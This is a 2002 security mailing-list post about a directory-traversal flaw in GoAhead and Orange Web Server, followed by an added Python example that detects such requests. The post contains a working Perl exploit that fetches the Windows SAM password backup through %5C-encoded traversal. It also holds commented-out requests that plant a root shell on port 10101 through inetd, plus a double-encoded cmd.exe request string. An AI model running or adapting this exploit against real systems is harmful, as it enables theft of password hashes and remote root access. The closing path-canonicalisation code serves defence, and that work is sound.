Re:[VulnWatch] wp-02-0001: GoAhead Web Server Directory Traversal + Cross Site Scripting

From: xile@hushmail.com
To: vulnwatch@vulnwatch.org
Date: Wed, 17 Jul 2002 08:17:22 -0700


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have been aware for some time and I just wanted to add a little to
Mr. Moore's observations:

Title: GoAhead Web Server Directory Traversal + Cross Site Scripting

>Also Affected: Orange Web Server - all versions

Risk Rating: Medium

>escalated to risk: high - password hash pilfer via 300-year-old
>traversal technique

Software: GoAhead Web Server v2.1
<added: Orange Web Server - All
<Orange Web Server uses GoAhead WebServer 2.1 technology so it is
<powerful and stable. - nuff said

Platforms: Windows NT/98/95/CE
            Embedded Linux
            Linux
            QNX
            Novell Netware + others

<ADDED: Hard Hat Linux - started bundling GoAhead with their distros,
<so there should be Palm Pilots, cellphones and all kinds of nifty
<prototype devices running this sad-ware

#!/usr/bin/perl
# spawns a shell on port 10101
# (the shell part is the commented-out unix scenario below; the live
# request as written fetches the SAM backup from a win32 target)
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 1) { print "usage: perl go-orange.pl [host]\n"; exit; }
my $host = $ARGV[0];

my $shell = IO::Socket::INET->new( PeerAddr => $host,
                                   PeerPort => "80",
                                   Proto    => "tcp") || die "Connection failed.\n";

#dump sam is success on Orange and GoAhead!- was able to jump around
#and do interesting things with encoding 0-day
#%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65

# each %5C decodes to a backslash after the server's root check, walking
# up out of the web root to the SAM backup in the repair directory
print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam HTTP/1.0\n\n";

# echo whatever the server sends back (the SAM backup if the traversal worked)
print while <$shell>;
close $shell;

##################################################################
#commented out hypothetical embedded webserver in transmeta-maytag
#stove scenario. Will leave hand held device ( game boy) format vuln
#testing to experts at Non-profit .org's
# Only testbeds I saw were win32 ( I only looked for 10 minutes)

#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2
#0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
#HTTP/1.0\n\n";

# we get signal again
#$shell = IO::Socket::INET->new( PeerAddr=>"$host",
#PeerPort=>"80",
#Proto=>"tcp") || die "fuq, we no get signal.\n";

#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|
#HTTP/1.0\n\n";

sleep 1;

print "handheld haqrz connect to $host on port 10101...";
system("telnet $host 10101");

- - xile
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlkEARECABkFAj01ioASHHhpbGVAaHVzaG1haWwuY29tAAoJEBnsRZrmhGsJapUAnRCE
Mg4OfVISUBrPgWxFcbW2mK6XAJ4/xxmJInaJRv/YqC45ki6wYPOPbA==
=IKhW
-----END PGP SIGNATURE-----
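The two request strings in the post (the %5C traversal to the SAM backup, and the double-encoded cmd.exe string in the "encoding 0-day" comment) both beat the same kind of root check: one that looks at the request before it has been fully decoded and backslashes have been treated as separators. The following is an added example, written for this page and not code from xile, GoAhead or Orange, showing how a server or a log-review script should canonicalise a request path before deciding whether it stays inside the web root. The function names, the MAX_DECODE_ROUNDS cap and the two benign control paths are my assumptions; the first two sample paths are copied from the post.

```python
"""Canonicalise a request path the way a permissive Windows file API would
resolve it, then decide whether it escapes the web root.

Added example, not GoAhead code. Sample inputs are labelled below.
"""
import posixpath
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: cap repeated decoding so a hostile input cannot loop forever


def percent_decode_fully(raw, max_rounds=MAX_DECODE_ROUNDS):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds). rounds == 0 means nothing was encoded;
    rounds >= 2 means the client sent a double-encoded request, which is
    what the post's cmd.exe string relies on (%25%32%30 -> %20 -> space).
    A single-pass check only sees the first layer.
    """
    current, rounds = raw, 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def min_depth(path):
    """Walk the path components and return the lowest directory depth reached
    relative to the web root. Negative means the request climbed above the
    document root, which is the traversal condition. A plain '..' substring
    test would also reject harmless paths like /docs/../index.htm."""
    depth = lowest = 0
    for part in path.split("/"):
        if part == "..":
            depth -= 1
            lowest = min(lowest, depth)
        elif part not in ("", "."):
            depth += 1
    return lowest


def analyze_request_path(raw):
    """Decode fully, unify separators, anchor at the root, then classify."""
    decoded, rounds = percent_decode_fully(raw)
    path = decoded.split("?", 1)[0]     # drop the query string
    path = path.replace("\\", "/")      # Windows accepts either separator, so must we
    if not path.startswith("/"):
        path = "/" + path               # requests are relative to the web root
    lowest = min_depth(path)
    if lowest < 0:
        verdict = "traversal"
    elif rounds >= 2:
        verdict = "double-encoded"
    else:
        verdict = "ok"
    return {
        "decoded": decoded,
        "decode_rounds": rounds,
        "min_depth": lowest,
        "resolved": posixpath.normpath(path),
        "verdict": verdict,
    }


# Constructed sample set: the first two strings are taken from the post, the
# last two are benign controls that a naive ".." substring check would misjudge.
SAMPLE_PATHS = [
    "/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam",
    "%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65",
    "/index.htm",
    "/docs/../index.htm",
]

if __name__ == "__main__":
    for raw in SAMPLE_PATHS:
        r = analyze_request_path(raw)
        print(f"{r['verdict']:14} rounds={r['decode_rounds']} depth={r['min_depth']:3} "
              f"{raw} -> {r['resolved']}")
```

The order of operations is the whole point: decode to a fixed point first, map backslashes to slashes second, and only then count depth. A check done before either step is exactly what the %5C and %25-encoded requests walk past.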
